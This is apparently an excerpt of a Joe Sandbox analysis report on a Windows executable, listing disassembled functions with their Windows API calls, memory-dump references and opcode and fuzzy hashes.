Function 00788AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00788BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00788BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00788C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00788C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00788C5F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 49573867ce15f762314832919587e59928718e0e63a931be11c132400b93aa46
Instruction ID: bff4806f86c215d9bcee4551e6ff29b6d857176a3fef565e5111fb3c63802d5c
Opcode Fuzzy Hash: 49573867ce15f762314832919587e59928718e0e63a931be11c132400b93aa46
Instruction Fuzzy Hash: DC514F35A00215DFCB05DF64C885AADBBF5FF49314F088498E849AB3A2DB39ED51CB91

Function 00798EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00798F40
GetProcAddress.KERNEL32(00000000,?), ref: 00798FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00798FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00799032
FreeLibrary.KERNEL32(00000000), ref: 00799052

Part of subcall function 0072F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00781043,?,7529E610), ref: 0072F6E6
Part of subcall function 0072F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0076FA64,00000000,00000000,?,?,00781043,?,7529E610,?,0076FA64), ref: 0072F70D

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: b9faf10cb567af433e52fa7075164347c1f9d944238f51e69bba29c1953d8d7c
Instruction ID: 339826e85688129c538e467c16645cff0f6d0e30de08766ad04096fb614b8c0a
Opcode Fuzzy Hash: b9faf10cb567af433e52fa7075164347c1f9d944238f51e69bba29c1953d8d7c
Instruction Fuzzy Hash: 96514E34600205DFCB15DF58D4948ADBBF1FF49314F048098E9169B362DB39ED86CB91

Function 007A6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 007A6C33
SetWindowLongW.USER32(?,000000EC,?), ref: 007A6C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 007A6C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0078AB79,00000000,00000000), ref: 007A6C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 007A6CC7

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 4c862896f41cc54575a4fa83c556583b2dd16c6dc232d309c07840ad5ec9d601
Instruction ID: c0be182e6a40188d8e4e1ed69b16c75ad4722fea236826e68eba213fe2c273ef
Opcode Fuzzy Hash: 4c862896f41cc54575a4fa83c556583b2dd16c6dc232d309c07840ad5ec9d601
Instruction Fuzzy Hash: CB41D075A04104BFD724DF28CC48BA97BA5EB8B360F194368F895A72E0C779FD40CA60

Function 00742051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 007420C3
_free.LIBCMT ref: 007420E3

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 86cf9ff042edd9f604c5850ddd51545892b163ed8fb6afd9b470b5ad46c0d257
Instruction ID: 3b48ed716823fd4e606d038a901500b35ad9d5e1343c2768ac84ff8c96579d86
Opcode Fuzzy Hash: 86cf9ff042edd9f604c5850ddd51545892b163ed8fb6afd9b470b5ad46c0d257
Instruction Fuzzy Hash: 1F41D032A002049FDB24DF78C884A5EB7F5EF88310F5545A9F515EB366EB35AD12CB90

Function 0072912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00729141
ScreenToClient.USER32(00000000,?), ref: 0072915E
GetAsyncKeyState.USER32(00000001), ref: 00729183
GetAsyncKeyState.USER32(00000002), ref: 0072919D

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 3edae845eba0d86161f8a8d5346c829583dcf285b05d98644f4fe9b78ab5f293
Instruction ID: 4fd9bdfbef24dca1c04dd6c64decf63aa1d9b56ee86c598a2c5c0af66cadec31
Opcode Fuzzy Hash: 3edae845eba0d86161f8a8d5346c829583dcf285b05d98644f4fe9b78ab5f293
Instruction Fuzzy Hash: 3C41903190821AFBDF099F68D848BEEB774FB46364F248216E925A32D0C7385D50CBA1

Function 00783874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 007838CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00783922
TranslateMessage.USER32(?), ref: 0078394B
DispatchMessageW.USER32(?), ref: 00783955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00783966

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 1492f31529dd2e0a7a185aa7bc2c38d7ab5255fed3bf59a395305264b986ecf1
Instruction ID: 556d7e165740bce44474434c1befb76762fd4cd6deb36cde88f95bcb1bd9135a
Opcode Fuzzy Hash: 1492f31529dd2e0a7a185aa7bc2c38d7ab5255fed3bf59a395305264b986ecf1
Instruction Fuzzy Hash: B4311A709853819EEB35EB3CD849FB637A8EB05708F44456DE466C60A0E3FCB685CB21

Function 0078CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0078C21E,00000000), ref: 0078CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0078CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0078C21E,00000000), ref: 0078CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0078C21E,00000000), ref: 0078CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0078C21E,00000000), ref: 0078CFF2

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 157a030967e744a7ea54b4c8a2b3de7d44931837db61e1485a025e26675ddbd3
Instruction ID: 02da19631f17b63c90bd373601da9104c8f9727fdff3ca8cba969361f966149d
Opcode Fuzzy Hash: 157a030967e744a7ea54b4c8a2b3de7d44931837db61e1485a025e26675ddbd3
Instruction Fuzzy Hash: C5315472544205FFEB21EFA5D88496B77F9EB55354B10842EF606D2140DB38AD41DB60

Function 00771901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00771915
PostMessageW.USER32(00000001,00000201,00000001), ref: 007719C1
Sleep.KERNEL32(00000000,?,?,?), ref: 007719C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 007719DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 007719E2

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 6da31fa6fad30290b62d42899acc5cc9f96620f3ee2101bd0e80ddef42215b60
Instruction ID: d69031b206f0d91c3cfd301de69af99910b1bda47eed75242d0c15a50dd6f1bd
Opcode Fuzzy Hash: 6da31fa6fad30290b62d42899acc5cc9f96620f3ee2101bd0e80ddef42215b60
Instruction Fuzzy Hash: 6831CD71A00259EFCF00CFACC999AEE3BB5EB45314F008229FA25A72D0C374A945CF90

Function 007A5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 007A5745
SendMessageW.USER32(?,00001074,?,00000001), ref: 007A579D
_wcslen.LIBCMT ref: 007A57AF
_wcslen.LIBCMT ref: 007A57BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 007A5816

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 9a21b0322d220719e090b0822fe9ae3608c522dd8765abdd148ad085a2f5f7ed
Instruction ID: 4f7bfbce01983ce7c2ed400ca59cd53d69f10829eca10364f2430cc91933e510
Opcode Fuzzy Hash: 9a21b0322d220719e090b0822fe9ae3608c522dd8765abdd148ad085a2f5f7ed
Instruction Fuzzy Hash: F721A271904618EADB208FA0CC85EEE77B8FF86320F108356F929EA181D7789985CF50

Function 00790930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00790951
GetForegroundWindow.USER32 ref: 00790968
GetDC.USER32(00000000), ref: 007909A4
GetPixel.GDI32(00000000,?,00000003), ref: 007909B0
ReleaseDC.USER32(00000000,00000003), ref: 007909E8

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: c4c3b1ddd2a95e287abccbe46cb13899b3a724d823d79cc7bf28d7106dc22720
Instruction ID: 131e460efd0d28d2715b1df3b19fc8066e71a0825e77e9c532e8d06317d211f9
Opcode Fuzzy Hash: c4c3b1ddd2a95e287abccbe46cb13899b3a724d823d79cc7bf28d7106dc22720
Instruction Fuzzy Hash: FA219675600204EFD704EF69D948AAEB7F9EF49710F048468F84AD7352DB38AC44CB90

Function 0074CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0074CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0074CDE9

Part of subcall function 00743820: RtlAllocateHeap.NTDLL(00000000,?,007E1444,?,0072FDF5,?,?,0071A976,00000010,007E1440,007113FC,?,007113C6,?,00711129), ref: 00743852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0074CE0F
_free.LIBCMT ref: 0074CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0074CE31

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: cb267e277d34f1bf080a79e21e6cf5ac0f8b93590842f258660448138e145642
Instruction ID: e10bb750703c34dfcff45397270a766a4ba95066399be75725b5e040f3b825f5
Opcode Fuzzy Hash: cb267e277d34f1bf080a79e21e6cf5ac0f8b93590842f258660448138e145642
Instruction Fuzzy Hash: 7101D4726032257F276316B66C8CC7B696DDEC7BA1315412DF905C7201EF798D0291B4

Function 00729639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00729693
SelectObject.GDI32(?,00000000), ref: 007296A2
BeginPath.GDI32(?), ref: 007296B9
SelectObject.GDI32(?,00000000), ref: 007296E2

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 7d7a1ac49c91bde26a6adce58121af3b5eb4251f053cdd4932342651be3958d9
Instruction ID: 0016f455f1bde8896828d5d2e82a7c2917cf1b63f0ea1c13ab0cb60bd240d9ed
Opcode Fuzzy Hash: 7d7a1ac49c91bde26a6adce58121af3b5eb4251f053cdd4932342651be3958d9
Instruction Fuzzy Hash: 6521C5708033D5EFDB118F24EC49BA93BB4BB45355F548215F510AA1B1D37C6881CF98

Function 00775711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00775726
_memcmp.LIBVCRUNTIME ref: 00775744
_memcmp.LIBVCRUNTIME ref: 00775757
_memcmp.LIBVCRUNTIME ref: 0077576F
_memcmp.LIBVCRUNTIME ref: 00775787

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 8edd2fa962bebb852ec6cc38a95820d4f66c201fe34b2c4dd394376aa1720395
Instruction ID: 920d362e614cb3e5c73ac44085ac043bb25794722ae00f593bc49645bb721e0c
Opcode Fuzzy Hash: 8edd2fa962bebb852ec6cc38a95820d4f66c201fe34b2c4dd394376aa1720395
Instruction Fuzzy Hash: F60175E1641A09FBEA0C57219D86FBB735D9B613E5F408121FD0C9A642F7ADED1082F1

Function 00742DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0073F2DE,00743863,007E1444,?,0072FDF5,?,?,0071A976,00000010,007E1440,007113FC,?,007113C6), ref: 00742DFD
_free.LIBCMT ref: 00742E32
_free.LIBCMT ref: 00742E59
SetLastError.KERNEL32(00000000,00711129), ref: 00742E66
SetLastError.KERNEL32(00000000,00711129), ref: 00742E6F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 671eb169bc0c2ebc2b2c6be1c3ee23ebc2717b3a1e87efc6cb9ebf9bf8763ed6
Instruction ID: ed432084d1bab747334970ff3bc0e11594b2926819d681a801268feadd53f509
Opcode Fuzzy Hash: 671eb169bc0c2ebc2b2c6be1c3ee23ebc2717b3a1e87efc6cb9ebf9bf8763ed6
Instruction Fuzzy Hash: D301F972245621B7C61367356C4ED2B2669ABD27A17E44025F415E2193EF7CCC238524

Function 0077000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?,?,?,0077035E), ref: 0077002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?,?), ref: 00770046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?,?), ref: 00770054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?), ref: 00770064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?,?), ref: 00770070

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: dd31c680bb045cad86d64b370ac17d5d07ac5078c5ebf59bf3010a2992dabfcf
Instruction ID: b3318dddae2431434e652a5ab01647363c06d195fc24c13972a82f311b94fc67
Opcode Fuzzy Hash: dd31c680bb045cad86d64b370ac17d5d07ac5078c5ebf59bf3010a2992dabfcf
Instruction Fuzzy Hash: 78014B76600214FFDF124F69DC48BAA7AEDEB847A2F148124F909D6210EB7DDD40DBA0

Function 0077E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0077E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0077E9A5
Sleep.KERNEL32(00000000), ref: 0077E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0077E9B7
Sleep.KERNEL32 ref: 0077E9F3

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: f37bc50a9af1c14a8d96d98e4729224c201ec0c4984f05155e304159a0187bdd
Instruction ID: 7f645410aa6b746828b36e69e76cb40bc58745661e6931fa2dad3d19cff1b082
Opcode Fuzzy Hash: f37bc50a9af1c14a8d96d98e4729224c201ec0c4984f05155e304159a0187bdd
Instruction Fuzzy Hash: CE015B72D0152DEBCF009BE4D849ADDBB78BF4E301F008596E606B2241DB38A555CB66

Function 007710F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00771114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 00771120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 0077112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 00771136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0077114D

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 8f09c2b92b1e50f50cb31fd749957f6f01e7b7d453fd34dc5a7cf4e4720810cb
Instruction ID: c960b6721a75f1b66d723341ca3091e1be999c208ab9a436159d755fc26809b7
Opcode Fuzzy Hash: 8f09c2b92b1e50f50cb31fd749957f6f01e7b7d453fd34dc5a7cf4e4720810cb
Instruction Fuzzy Hash: 17011975200209BFDB124FA9DC59A6A3B6EEFCA3A0B608419FA45D7360DA35DD009F64

Function 00770FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00770FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00770FD6
